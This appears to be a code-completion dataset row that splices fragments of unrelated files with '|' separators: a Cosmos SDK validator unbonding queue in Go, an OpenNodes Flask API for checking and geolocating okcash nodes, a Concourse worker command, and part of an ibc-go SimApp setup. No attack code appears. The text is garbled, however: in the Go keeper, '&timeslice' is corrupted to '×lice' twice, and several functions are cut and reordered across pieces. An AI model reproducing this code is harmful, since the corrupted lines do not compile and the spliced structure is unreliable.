func (k Keeper) GetValidatorQueueTimeSlice(ctx sdk.Context, timestamp time.Time) (valAddrs []sdk.ValAddress) {
store := ctx.KVStore(k.storeKey)
bz := store.Get(GetValidatorQueueTimeKey(timestamp))
if bz == nil {
return []sdk.ValAddress{}
}
k.cdc.MustUnmarshalBinaryLengthPrefixed(bz, &valAddrs)
return valAddrs
}
// Sets a specific validator queue timeslice.
func (k Keeper) SetValidatorQueueTimeSlice(ctx sdk.Context, timestamp time.Time, keys []sdk.ValAddress) {
store := ctx.KVStore(k.storeKey)
bz := k.cdc.MustMarshalBinaryLengthPrefixed(keys)
store.Set(GetValidatorQueueTimeKey(timestamp), bz)
}
// Deletes a specific validator queue timeslice.
func (k Keeper) DeleteValidatorQueueTimeSlice(ctx sdk.Context, timestamp time.Time) {
store := ctx.KVStore(k.storeKey)
store.Delete(GetValidatorQueueTimeKey(timestamp))
}
// Insert an validator address to the appropriate timeslice in the validator queue
func (k Keeper) InsertValidatorQueue(ctx sdk.Context, val types.Validator) {
timeSlice := k.GetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime)
var keys []sdk.ValAddress
if len(timeSlice) == 0 {
keys = []sdk.ValAddress{val.OperatorAddress}
} else {
keys = append(timeSlice, val.OperatorAddress)
}
k.SetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime, keys)
}
// Delete a validator address from the validator queue
func (k Keeper) DeleteValidatorQueue(ctx sdk.Context, val types.Validator) {
timeSlice := k.GetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime)
newTimeSlice := []sdk.ValAddress{}
for _, addr := range timeSlice {
if !bytes.Equal(addr, val.OperatorAddress) {
newTimeSlice = append(newTimeSlice, addr)
}
}
if len(newTimeSlice) == 0 {
k.DeleteValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime)
} else {
k.SetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime, newTimeSlice)
}
}
// Returns all the validator queue timeslices from time 0 until endTime
func (k Keeper) ValidatorQueueIterator(ctx sdk.Context, endTime time.Time) sdk.Iterator {
store := ctx.KVStore(k.storeKey)
return store.Iterator(ValidatorQueueKey,
sdk.InclusiveEndBytes(GetValidatorQueueTimeKey(endTime)))
}
// Returns a concatenated list of all the timeslices before currTime, and deletes the timeslices from the queue
func (k Keeper) GetAllMatureValidatorQueue(ctx sdk.Context, currTime time.Time) (matureValsAddrs []sdk.ValAddress) {
// gets an iterator for all timeslices from time 0 until the current Blockheader time
validatorTimesliceIterator := k.ValidatorQueueIterator(ctx, ctx.BlockHeader().Time)
for ; validatorTimesliceIterator.Valid(); validatorTimesliceIterator.Next() {
timeslice := []sdk.ValAddress{}
k.cdc.MustUnmarshalBinaryLengthPrefixed(validatorTimesliceIterator.Value(), ×lice)
matureValsAddrs = append(matureValsAddrs, timeslice...)
}
return matureValsAddrs
}
// Unbonds all the unbonding validators that have finished their unbonding period
func (k Keeper) UnbondAllMatureValidatorQueue(ctx sdk.Context) {
store := ctx.KVStore(k.storeKey)
validatorTimesliceIterator := k.ValidatorQueueIterator(ctx, ctx.BlockHeader().Time)
for ; validatorTimesliceIterator.Valid(); validatorTimesliceIterator.Next() {
timeslice := []sdk.ValAddress{}
k.cdc.MustUnmarshalBinaryLengthPrefixed(validatorTimesliceIterator.Value(), ×lice)
for _, valAddr := range timeslice {
val, found := k.GetValidator(ctx, valAddr)
if !found {
panic("validator in the unbonding queue was not found")
}
if val.GetStatus() != sdk.Unbonding {
panic("unexpected validator in unbonding queue, status was not unbonding")
}
k.unbondingToUnbonded(ctx, val)
if val.GetDelegatorShares().IsZero() {
k.RemoveValidator(ctx, val.OperatorAddress)
}
}
store.Delete(validatorTimesliceIterator.Key())
}
}
|
{
return cachedValidator{
val: val,
marshalled: marshalled,
}
}
|
app.py
|
"""
Open Nodes web server
Copyright (c) 2018 Opennodes / Blake Bjorn Anderson
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import gzip
import json
import os
import sys
from io import BytesIO
from flask import Flask, render_template, request, redirect, flash, Response
from flask_sqlalchemy import SQLAlchemy
from geoip2.errors import AddressNotFoundError
from sqlalchemy import and_
from config import load_config, DefaultFlaskConfig
from crawler import init_geoip, connect
from models import *
import pandas as pd
from autodoc import Autodoc
app = Flask(__name__)
auto = Autodoc(app)
app.config.from_object(DefaultFlaskConfig())
app.config.from_object('flask_config')
db = SQLAlchemy(app)
CONF = load_config()
COUNTRY, CITY, ASN = init_geoip()
@app.route('/')
@app.route('/networks/<network_name>', methods=['GET'])
def network_dashboard(network_name=None):
if not network_name in ("okcash", "testnet", None):
flash("Invalid network")
return redirect("/")
with open("static/network_summaries.json", 'r') as f:
summaries = json.load(f)
if network_name:
age_min = summaries[network_name]['age_min']
age_max = summaries[network_name]['age_max']
else:
age_min = min((summaries[network]['age_min'] for network in CONF['networks']))
age_max = max((summaries[network]['age_max'] for network in CONF['networks']))
return render_template("network_dashboard.html",
network=network_name,
include_client=False if network_name is not None else False,
include_user_agent=True if network_name is not None else False,
include_network=True if network_name is None else False,
include_version=True if network_name is not None else False,
include_active=True if CONF['export_inactive_nodes'] else False,
age_min=age_min * 1000.0,
age_max=age_max * 1000.0)
def gzip_response(input_str, pre_compressed):
response = Response()
if not pre_compressed:
buffer = BytesIO()
gzip_file = gzip.GzipFile(mode='wb', fileobj=buffer)
gzip_file.write(input_str if isinstance(input_str, bytes) else input_str.encode())
gzip_file.close()
response.data = buffer.getvalue()
else:
response.data = input_str
response.headers['Content-Encoding'] = 'gzip'
response.headers['Vary'] = 'Accept-Encoding'
response.headers['Content-Length'] = len(response.data)
return response
@app.route('/api/get_networks', methods=['POST'])
@auto.doc()
def get_networks():
"""
Returns a list of all available network names
:return: JSON string, ex. "['okcash','testnet']"
"""
return json.dumps([x[0] for x in db.session.query(Node.network).distinct().all()])
@app.route('/api/gzip_file/<filename>', methods=['GET'])
@auto.doc()
def gzip_static_file(filename):
"""
Returns a crawl result as a gzipped response
:param filename: file_network.ext - file is 'data' or 'history', ext is either .json, .csv, .txt (data.ext returns data for all crawled networks)
:return: gzip encoded html response
"""
valid_files = ["custom.geo.json"]
for coin in ("", "_groestlcoin", "_testnet"):
for suff in ("", "_unique"):
for ext in (".csv", ".json", ".txt"):
valid_files.append("data" + coin + suff + ext)
valid_files.append("history" + coin + '.json')
if filename not in valid_files:
return redirect("/", code=404)
with open(os.path.join("static", filename), "r") as f:
return gzip_response(f.read(), False)
def deconstruct_address_string(inp):
assert isinstance(inp, str)
resp = {}
aliases = {'ok': 'okcash',
'tok': 'testnet'}
inp = inp.lower()
network = inp.split(":")[0]
if network:
inp = ":".join(inp.split(":")[1:])
network = aliases[network] if network in aliases else network
network = network if network in CONF['networks'] else None
if not network:
network = "okcash"
resp['warning'] = "Network not recognized, using OK"
if ":" in inp:
port = inp.split(":")[-1]
try:
port = int(port)
inp = ":".join(inp.split(":")[:-1])
except ValueError:
resp['warning'] = "port not recognized, using default"
port = int(CONF['networks'][network]['port'])
else:
port = int(CONF['networks'][network]['port'])
return network, inp, port, resp
@app.route('/api/check_node', methods=['POST'])
@auto.doc()
def check_node():
"""
Checks the current status of a node. This is a live result, so response times will be longer - to view a saved
result see /api/check_historic_node.
:param node: connection string, e.g. ok:127.0.0.1:6970 - port is optional if it is the network default
:param to_services (integer, optional): outgoing services to broadcast, default=0
:param from_services (integer, optional): outgoing services to broadcast, default=0
:param version (integer, optional): version code to broadcast, default varies by network
:param user_agent (string, optional): user agent to broadcast, default="/oknodes:0.1/"
:param height (integer, optional): block height to broadcast during handshake. default=network median
:param p2p_nodes (bool, optional): issues a getaddr call and list of connected nodes, default=False
:return: json dict {"result":{"user_agent":"/oktoshi:5.0.0.2/", "version":" .... }, "nodes":[["127.0.0.1:6970, 157532132191], ...]}
"""
dat = request.form
node = dat.get("node")
network, address, port, resp = deconstruct_address_string(node)
network_data = CONF['networks'][network]
if dat.get("height"):
network_data['height'] = dat.get("height")
else:
with open("static/network_summaries.json", 'r') as f:
network_data['height'] = int(json.load(f)[network]['med'])
network_data['protocol_version'] = dat.get("version") or network_data['protocol_version']
result = connect(network, address, port,
to_services=dat.get("to_services") or network_data['services'],
network_data=network_data,
user_agent=dat.get("user_agent") or None,
p2p_nodes=False,
explicit_p2p=dat.get("p2p_nodes") or False,
from_services=dat.get('from_services') or None,
keepalive=False)
resp['result'] = result[0]
resp['nodes'] = result[1]
resp['result'] = geocode(resp['result'])
return to_json(resp)
|
@auto.doc()
def check_historic_node():
"""
Checks the status of a node based on the last crawl
result see /api/check_historical_node
:param node: connection string, e.g. ok:127.0.0.1:6970 - port is optional if it is the network default
:return: json dict {"result":{"user_agent":"/oktoshi:5.0.0.2/", "version":" .... }}
"""
if request.method == "POST":
dat = request.form
else:
dat = request.args
node = dat.get("node")
network, address, port, resp = deconstruct_address_string(node)
if network not in CONF['networks']:
return json.dumps({'error': "network not recognized"})
result = db.session.query(Node).get((network, address, port))
resp['result'] = "None" if result is None else result.to_dict()
return to_json(resp)
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/api_docs")
def api_docs():
return auto.html()
@app.route('/api/get_nodes', methods=['POST'])
@auto.doc()
def get_node_list():
"""
Gets a list of all nodes visible during the past 30 days
:param network (optional): Filters the result set based on the given network
:return: json array [{"address":"127.0.0.1" ... }, {"address":"0.0.0.0", "port:6970}]
"""
q = db.session.query(Node.network, Node.address, Node.port, Node.user_agent, Node.version, Node.first_seen,
Node.last_seen, Node.last_checked, Node.country, Node.city, Node.asn, Node.aso).filter(
Node.seen)
if request.args.get("network") is not None:
network = request.args.get("network")
if network not in CONF['networks']:
return {"error": "network must be one of " + ", ".join(CONF['networks'])}
q = q.filter(Node.network == network)
return pd.read_sql(q.statement, q.session.bind).to_json(orient='records')
@app.route('/api/node_history', methods=['POST'])
@auto.doc()
def get_node_history():
"""
Returns the data associated with a node, and all crawler visitations on record
:param node: connection string, e.g. ok:127.0.0.1:6970 - port is optional if it is the network default.
:return: json dict {"node":{"user_agent":"/oktoshi/", "last_seen": ... }, "history":{"timestamp":157032190321,"height":56000, "success":1 ...}}
"""
node = request.form.get("node")
network, address, port, resp = deconstruct_address_string(node)
if network not in CONF['networks']:
return json.dumps({'error': "network not recognized"})
default_port = int(CONF['networks'][network]['port'])
resp = {}
try:
port = int(port) if port is not None else default_port
except ValueError:
resp['warning'] = "port not recognized, using default"
port = default_port
n = db.session.query(Node.network, Node.address, Node.port, Node.user_agent, Node.version, Node.first_seen,
Node.last_seen, Node.last_checked, Node.country, Node.city, Node.asn, Node.aso) \
.filter(and_(Node.network == network, Node.address == address, Node.port == port)).one()
q = db.session.query(NodeVisitation.timestamp, NodeVisitation.height, NodeVisitation.success) \
.join(Node, and_(Node.network == NodeVisitation.network, Node.address == NodeVisitation.address,
Node.port == NodeVisitation.port)) \
.filter(and_(Node.network == network, Node.address == address, Node.port == port)) \
.order_by(NodeVisitation.timestamp.desc())
df = pd.read_sql(q.statement, q.session.bind)
df['timestamp'] = df['timestamp'].astype(pd.np.int64) // 10 ** 9
resp.update({"node": {"network": n.network, 'address': n.address, "port": n.port, "user_agent": n.user_agent,
"version": n.version,
"first_seen": n.first_seen,
"last_seen": n.last_seen,
"last_checked": n.last_checked,
"country": n.country, "city": n.city, "asn": n.asn, "aso": n.aso},
"history": df.to_dict(orient='records')})
return to_json(resp)
def geocode(result):
if result and result['address'].endswith('.onion'):
aso, asn, country, city = "Anonymous", "Anonymous", "Anonymous", "Anonymous"
elif result:
try:
aso = ASN.asn(result['address']).autonomous_system_organization
asn = ASN.asn(result['address']).autonomous_system_number
except AddressNotFoundError:
aso = None
asn = None
try:
country = COUNTRY.country(result['address']).country.name
except AddressNotFoundError:
country = None
try:
city = CITY.city(result['address']).city.name
except AddressNotFoundError:
city = None
else:
return result
result['aso'] = aso
result['asn'] = asn
result['country'] = country
result['city'] = city
return result
def clean_dates(d):
for i in d:
if isinstance(d[i], datetime.datetime):
d[i] = d[i].timestamp()
if isinstance(d[i], dict):
d[i] = clean_dates(d[i])
return d
def to_json(d):
"""
Sanitizes a dictionary - converts datetime.datetime instances to timestamps
:param d: dictionary
:return: json string
"""
d = clean_dates(d)
return json.dumps(d)
def main():
app.run("0.0.0.0", debug=False if "--prod" in sys.argv else True, port=8888 if "--prod" in sys.argv else 5000)
# app.run("0.0.0.0", debug=False if "--prod" in sys.argv else True, port=443 if "--prod" in sys.argv else 5000, ssl_context=('/etc/letsencrypt/live/nodes.okcash.org/fullchain.pem', '/etc/letsencrypt/live/nodes.okcash.org/privkey.pem'))
if __name__ == '__main__':
main()
|
@app.route('/api/check_historic_node', methods=['POST', 'GET'])
|
worker.go
|
package main
import (
"fmt"
"os"
"path/filepath"
"code.cloudfoundry.org/lager"
"github.com/concourse/baggageclaim/baggageclaimcmd"
"github.com/concourse/concourse"
concourseWorker "github.com/concourse/concourse/worker"
"github.com/concourse/concourse/worker/beacon"
workerConfig "github.com/concourse/concourse/worker/start"
"github.com/concourse/concourse/worker/sweeper"
"github.com/concourse/concourse/worker/tsa"
"github.com/concourse/flag"
"github.com/tedsuo/ifrit"
"github.com/tedsuo/ifrit/grouper"
"github.com/tedsuo/ifrit/sigmon"
)
type WorkerCommand struct {
Worker workerConfig.Config
TSA tsa.Config `group:"TSA Configuration" namespace:"tsa"`
Certs Certs
WorkDir flag.Dir `long:"work-dir" required:"true" description:"Directory in which to place container data."`
BindIP flag.IP `long:"bind-ip" default:"127.0.0.1" description:"IP address on which to listen for the Garden server."`
BindPort uint16 `long:"bind-port" default:"7777" description:"Port on which to listen for the Garden server."`
PeerIP flag.IP `long:"peer-ip" description:"IP used to reach this worker from the ATC nodes."`
Garden GardenBackend `group:"Garden Configuration" namespace:"garden"`
Baggageclaim baggageclaimcmd.BaggageclaimCommand `group:"Baggageclaim Configuration" namespace:"baggageclaim"`
ResourceTypes flag.Dir `long:"resource-types" description:"Path to directory containing resource types the worker should advertise."`
Logger flag.Lager
}
func (cmd *WorkerCommand) Execute(args []string) error {
runner, err := cmd.Runner(args)
if err != nil {
return err
}
return <-ifrit.Invoke(sigmon.New(runner)).Wait()
}
func (cmd *WorkerCommand) Runner(args []string) (ifrit.Runner, error) {
logger, _ := cmd.Logger.Logger("worker")
worker, gardenRunner, err := cmd.gardenRunner(logger.Session("garden"))
if err != nil {
return nil, err
}
worker.Version = concourse.WorkerVersion
baggageclaimRunner, err := cmd.baggageclaimRunner(logger.Session("baggageclaim"))
if err != nil {
return nil, err
}
members := grouper.Members{
{
Name: "garden",
Runner: gardenRunner,
},
{
Name: "baggageclaim",
Runner: baggageclaimRunner,
},
}
if cmd.TSA.WorkerPrivateKey != nil {
beaconConfig := beacon.Config{
TSAConfig: cmd.TSA,
}
if cmd.PeerIP.IP != nil {
worker.GardenAddr = fmt.Sprintf("%s:%d", cmd.PeerIP.IP, cmd.BindPort)
worker.BaggageclaimURL = fmt.Sprintf("http://%s:%d", cmd.PeerIP.IP, cmd.Baggageclaim.BindPort)
beaconConfig.Registration.Mode = "direct"
} else {
beaconConfig.Registration.Mode = "forward"
beaconConfig.GardenForwardAddr = fmt.Sprintf("%s:%d", cmd.BindIP.IP, cmd.BindPort)
beaconConfig.BaggageclaimForwardAddr = fmt.Sprintf("%s:%d", cmd.Baggageclaim.BindIP.IP, cmd.Baggageclaim.BindPort)
worker.GardenAddr = beaconConfig.GardenForwardAddr
worker.BaggageclaimURL = fmt.Sprintf("http://%s", beaconConfig.BaggageclaimForwardAddr)
}
members = append(members, grouper.Member{
Name: "beacon",
Runner: concourseWorker.BeaconRunner(
logger.Session("beacon"),
worker,
beaconConfig,
),
})
members = append(members, grouper.Member{
Name: "sweeper",
Runner: sweeper.NewSweeperRunner(
logger,
worker,
beaconConfig,
),
})
}
|
return grouper.NewParallel(os.Interrupt, members), nil
}
func (cmd *WorkerCommand) workerName() (string, error) {
if cmd.Worker.Name != "" {
return cmd.Worker.Name, nil
}
return os.Hostname()
}
func (cmd *WorkerCommand) baggageclaimRunner(logger lager.Logger) (ifrit.Runner, error) {
volumesDir := filepath.Join(cmd.WorkDir.Path(), "volumes")
err := os.MkdirAll(volumesDir, 0755)
if err != nil {
return nil, err
}
cmd.Baggageclaim.VolumesDir = flag.Dir(volumesDir)
cmd.Baggageclaim.OverlaysDir = filepath.Join(cmd.WorkDir.Path(), "overlays")
return cmd.Baggageclaim.Runner(nil)
}
| |
app.go
|
package simapp
import (
"encoding/json"
"io"
"net/http"
"os"
"path/filepath"
"github.com/gorilla/mux"
"github.com/rakyll/statik/fs"
"github.com/spf13/cast"
abci "github.com/tendermint/tendermint/abci/types"
"github.com/tendermint/tendermint/libs/log"
tmos "github.com/tendermint/tendermint/libs/os"
dbm "github.com/tendermint/tm-db"
"github.com/cosmos/cosmos-sdk/baseapp"
"github.com/cosmos/cosmos-sdk/client"
"github.com/cosmos/cosmos-sdk/client/grpc/tmservice"
"github.com/cosmos/cosmos-sdk/client/rpc"
"github.com/cosmos/cosmos-sdk/codec"
"github.com/cosmos/cosmos-sdk/codec/types"
"github.com/cosmos/cosmos-sdk/server/api"
"github.com/cosmos/cosmos-sdk/server/config"
servertypes "github.com/cosmos/cosmos-sdk/server/types"
"github.com/cosmos/cosmos-sdk/testutil/testdata"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/cosmos/cosmos-sdk/types/module"
"github.com/cosmos/cosmos-sdk/version"
"github.com/cosmos/cosmos-sdk/x/auth"
"github.com/cosmos/cosmos-sdk/x/auth/ante"
authrest "github.com/cosmos/cosmos-sdk/x/auth/client/rest"
authkeeper "github.com/cosmos/cosmos-sdk/x/auth/keeper"
authsims "github.com/cosmos/cosmos-sdk/x/auth/simulation"
authtx "github.com/cosmos/cosmos-sdk/x/auth/tx"
authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
"github.com/cosmos/cosmos-sdk/x/auth/vesting"
vestingtypes "github.com/cosmos/cosmos-sdk/x/auth/vesting/types"
"github.com/cosmos/cosmos-sdk/x/bank"
bankkeeper "github.com/cosmos/cosmos-sdk/x/bank/keeper"
banktypes "github.com/cosmos/cosmos-sdk/x/bank/types"
"github.com/cosmos/cosmos-sdk/x/capability"
capabilitykeeper "github.com/cosmos/cosmos-sdk/x/capability/keeper"
capabilitytypes "github.com/cosmos/cosmos-sdk/x/capability/types"
simappparams "github.com/cosmos/ibc-go/v3/testing/simapp/params"
"github.com/cosmos/cosmos-sdk/x/crisis"
crisiskeeper "github.com/cosmos/cosmos-sdk/x/crisis/keeper"
crisistypes "github.com/cosmos/cosmos-sdk/x/crisis/types"
distr "github.com/cosmos/cosmos-sdk/x/distribution"
distrclient "github.com/cosmos/cosmos-sdk/x/distribution/client"
distrkeeper "github.com/cosmos/cosmos-sdk/x/distribution/keeper"
distrtypes "github.com/cosmos/cosmos-sdk/x/distribution/types"
"github.com/cosmos/cosmos-sdk/x/evidence"
evidencekeeper "github.com/cosmos/cosmos-sdk/x/evidence/keeper"
evidencetypes "github.com/cosmos/cosmos-sdk/x/evidence/types"
"github.com/cosmos/cosmos-sdk/x/feegrant"
feegrantkeeper "github.com/cosmos/cosmos-sdk/x/feegrant/keeper"
feegrantmodule "github.com/cosmos/cosmos-sdk/x/feegrant/module"
"github.com/cosmos/cosmos-sdk/x/genutil"
genutiltypes "github.com/cosmos/cosmos-sdk/x/genutil/types"
"github.com/cosmos/cosmos-sdk/x/gov"
govkeeper "github.com/cosmos/cosmos-sdk/x/gov/keeper"
govtypes "github.com/cosmos/cosmos-sdk/x/gov/types"
"github.com/cosmos/cosmos-sdk/x/mint"
mintkeeper "github.com/cosmos/cosmos-sdk/x/mint/keeper"
minttypes "github.com/cosmos/cosmos-sdk/x/mint/types"
"github.com/cosmos/cosmos-sdk/x/params"
paramsclient "github.com/cosmos/cosmos-sdk/x/params/client"
paramskeeper "github.com/cosmos/cosmos-sdk/x/params/keeper"
paramstypes "github.com/cosmos/cosmos-sdk/x/params/types"
paramproposal "github.com/cosmos/cosmos-sdk/x/params/types/proposal"
"github.com/cosmos/cosmos-sdk/x/slashing"
slashingkeeper "github.com/cosmos/cosmos-sdk/x/slashing/keeper"
slashingtypes "github.com/cosmos/cosmos-sdk/x/slashing/types"
"github.com/cosmos/cosmos-sdk/x/staking"
stakingkeeper "github.com/cosmos/cosmos-sdk/x/staking/keeper"
stakingtypes "github.com/cosmos/cosmos-sdk/x/staking/types"
"github.com/cosmos/cosmos-sdk/x/upgrade"
upgradeclient "github.com/cosmos/cosmos-sdk/x/upgrade/client"
upgradekeeper "github.com/cosmos/cosmos-sdk/x/upgrade/keeper"
upgradetypes "github.com/cosmos/cosmos-sdk/x/upgrade/types"
ica "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts"
icacontroller "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/controller"
icacontrollerkeeper "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/controller/keeper"
icacontrollertypes "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/controller/types"
icahost "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/host"
icahostkeeper "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/host/keeper"
icahosttypes "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/host/types"
icatypes "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/types"
ibcfee "github.com/cosmos/ibc-go/v3/modules/apps/29-fee"
ibcfeekeeper "github.com/cosmos/ibc-go/v3/modules/apps/29-fee/keeper"
ibcfeetypes "github.com/cosmos/ibc-go/v3/modules/apps/29-fee/types"
transfer "github.com/cosmos/ibc-go/v3/modules/apps/transfer"
ibctransferkeeper "github.com/cosmos/ibc-go/v3/modules/apps/transfer/keeper"
ibctransfertypes "github.com/cosmos/ibc-go/v3/modules/apps/transfer/types"
ibc "github.com/cosmos/ibc-go/v3/modules/core"
ibcclient "github.com/cosmos/ibc-go/v3/modules/core/02-client"
ibcclientclient "github.com/cosmos/ibc-go/v3/modules/core/02-client/client"
ibcclienttypes "github.com/cosmos/ibc-go/v3/modules/core/02-client/types"
porttypes "github.com/cosmos/ibc-go/v3/modules/core/05-port/types"
ibchost "github.com/cosmos/ibc-go/v3/modules/core/24-host"
ibckeeper "github.com/cosmos/ibc-go/v3/modules/core/keeper"
ibcmock "github.com/cosmos/ibc-go/v3/testing/mock"
authz "github.com/cosmos/cosmos-sdk/x/authz"
authzkeeper "github.com/cosmos/cosmos-sdk/x/authz/keeper"
authzmodule "github.com/cosmos/cosmos-sdk/x/authz/module"
// unnamed import of statik for swagger UI support
_ "github.com/cosmos/cosmos-sdk/client/docs/statik"
)
const appName = "SimApp"
// IBC application testing ports
const (
MockFeePort string = ibcmock.ModuleName + ibcfeetypes.ModuleName
)
var (
// DefaultNodeHome default home directories for the application daemon
DefaultNodeHome string
// ModuleBasics defines the module BasicManager is in charge of setting up basic,
// non-dependant module elements, such as codec registration
// and genesis verification.
ModuleBasics = module.NewBasicManager(
auth.AppModuleBasic{},
genutil.AppModuleBasic{},
bank.AppModuleBasic{},
capability.AppModuleBasic{},
staking.AppModuleBasic{},
mint.AppModuleBasic{},
distr.AppModuleBasic{},
gov.NewAppModuleBasic(
paramsclient.ProposalHandler, distrclient.ProposalHandler, upgradeclient.ProposalHandler, upgradeclient.CancelProposalHandler,
ibcclientclient.UpdateClientProposalHandler, ibcclientclient.UpgradeProposalHandler,
),
params.AppModuleBasic{},
crisis.AppModuleBasic{},
slashing.AppModuleBasic{},
ibc.AppModuleBasic{},
feegrantmodule.AppModuleBasic{},
upgrade.AppModuleBasic{},
evidence.AppModuleBasic{},
transfer.AppModuleBasic{},
ibcmock.AppModuleBasic{},
ica.AppModuleBasic{},
authzmodule.AppModuleBasic{},
vesting.AppModuleBasic{},
ibcfee.AppModuleBasic{},
)
// module account permissions
maccPerms = map[string][]string{
authtypes.FeeCollectorName: nil,
distrtypes.ModuleName: nil,
minttypes.ModuleName: {authtypes.Minter},
stakingtypes.BondedPoolName: {authtypes.Burner, authtypes.Staking},
stakingtypes.NotBondedPoolName: {authtypes.Burner, authtypes.Staking},
govtypes.ModuleName: {authtypes.Burner},
ibctransfertypes.ModuleName: {authtypes.Minter, authtypes.Burner},
ibcfeetypes.ModuleName: nil,
icatypes.ModuleName: nil,
}
)
var (
_ App = (*SimApp)(nil)
_ servertypes.Application = (*SimApp)(nil)
)
// SimApp extends an ABCI application, but with most of its parameters exported.
// They are exported for convenience in creating helper functions, as object
// capabilities aren't needed for testing.
type SimApp struct {
*baseapp.BaseApp
legacyAmino *codec.LegacyAmino
appCodec codec.Codec
interfaceRegistry types.InterfaceRegistry
invCheckPeriod uint
// keys to access the substores
keys map[string]*sdk.KVStoreKey
tkeys map[string]*sdk.TransientStoreKey
memKeys map[string]*sdk.MemoryStoreKey
// keepers
AccountKeeper authkeeper.AccountKeeper
BankKeeper bankkeeper.Keeper
CapabilityKeeper *capabilitykeeper.Keeper
StakingKeeper stakingkeeper.Keeper
SlashingKeeper slashingkeeper.Keeper
MintKeeper mintkeeper.Keeper
DistrKeeper distrkeeper.Keeper
GovKeeper govkeeper.Keeper
CrisisKeeper crisiskeeper.Keeper
UpgradeKeeper upgradekeeper.Keeper
ParamsKeeper paramskeeper.Keeper
AuthzKeeper authzkeeper.Keeper
IBCKeeper *ibckeeper.Keeper // IBC Keeper must be a pointer in the app, so we can SetRouter on it correctly
IBCFeeKeeper ibcfeekeeper.Keeper
ICAControllerKeeper icacontrollerkeeper.Keeper
ICAHostKeeper icahostkeeper.Keeper
EvidenceKeeper evidencekeeper.Keeper
TransferKeeper ibctransferkeeper.Keeper
FeeGrantKeeper feegrantkeeper.Keeper
// make scoped keepers public for test purposes
ScopedIBCKeeper capabilitykeeper.ScopedKeeper
ScopedTransferKeeper capabilitykeeper.ScopedKeeper
ScopedIBCFeeKeeper capabilitykeeper.ScopedKeeper
ScopedFeeMockKeeper capabilitykeeper.ScopedKeeper
ScopedICAControllerKeeper capabilitykeeper.ScopedKeeper
ScopedICAHostKeeper capabilitykeeper.ScopedKeeper
ScopedIBCMockKeeper capabilitykeeper.ScopedKeeper
ScopedICAMockKeeper capabilitykeeper.ScopedKeeper
// make IBC modules public for test purposes
// these modules are never directly routed to by the IBC Router
ICAAuthModule ibcmock.IBCModule
FeeMockModule ibcmock.IBCModule
// the module manager
mm *module.Manager
// simulation manager
sm *module.SimulationManager
// the configurator
configurator module.Configurator
}
func init() {
userHomeDir, err := os.UserHomeDir()
if err != nil {
panic(err)
}
DefaultNodeHome = filepath.Join(userHomeDir, ".simapp")
}
// NewSimApp returns a reference to an initialized SimApp.
func NewSimApp(
logger log.Logger, db dbm.DB, traceStore io.Writer, loadLatest bool, skipUpgradeHeights map[int64]bool,
homePath string, invCheckPeriod uint, encodingConfig simappparams.EncodingConfig,
appOpts servertypes.AppOptions, baseAppOptions ...func(*baseapp.BaseApp),
) *SimApp {
appCodec := encodingConfig.Marshaler
legacyAmino := encodingConfig.Amino
interfaceRegistry := encodingConfig.InterfaceRegistry
bApp := baseapp.NewBaseApp(appName, logger, db, encodingConfig.TxConfig.TxDecoder(), baseAppOptions...)
bApp.SetCommitMultiStoreTracer(traceStore)
bApp.SetVersion(version.Version)
bApp.SetInterfaceRegistry(interfaceRegistry)
keys := sdk.NewKVStoreKeys(
authtypes.StoreKey, banktypes.StoreKey, stakingtypes.StoreKey,
minttypes.StoreKey, distrtypes.StoreKey, slashingtypes.StoreKey,
govtypes.StoreKey, paramstypes.StoreKey, ibchost.StoreKey, upgradetypes.StoreKey, feegrant.StoreKey,
evidencetypes.StoreKey, ibctransfertypes.StoreKey, icacontrollertypes.StoreKey, icahosttypes.StoreKey, capabilitytypes.StoreKey,
authzkeeper.StoreKey, ibcfeetypes.StoreKey,
)
tkeys := sdk.NewTransientStoreKeys(paramstypes.TStoreKey)
memKeys := sdk.NewMemoryStoreKeys(capabilitytypes.MemStoreKey)
app := &SimApp{
BaseApp: bApp,
legacyAmino: legacyAmino,
appCodec: appCodec,
interfaceRegistry: interfaceRegistry,
invCheckPeriod: invCheckPeriod,
keys: keys,
tkeys: tkeys,
memKeys: memKeys,
}
app.ParamsKeeper = initParamsKeeper(appCodec, legacyAmino, keys[paramstypes.StoreKey], tkeys[paramstypes.TStoreKey])
// set the BaseApp's parameter store
bApp.SetParamStore(app.ParamsKeeper.Subspace(baseapp.Paramspace).WithKeyTable(paramskeeper.ConsensusParamsKeyTable()))
// add capability keeper and ScopeToModule for ibc module
app.CapabilityKeeper = capabilitykeeper.NewKeeper(appCodec, keys[capabilitytypes.StoreKey], memKeys[capabilitytypes.MemStoreKey])
scopedIBCKeeper := app.CapabilityKeeper.ScopeToModule(ibchost.ModuleName)
scopedTransferKeeper := app.CapabilityKeeper.ScopeToModule(ibctransfertypes.ModuleName)
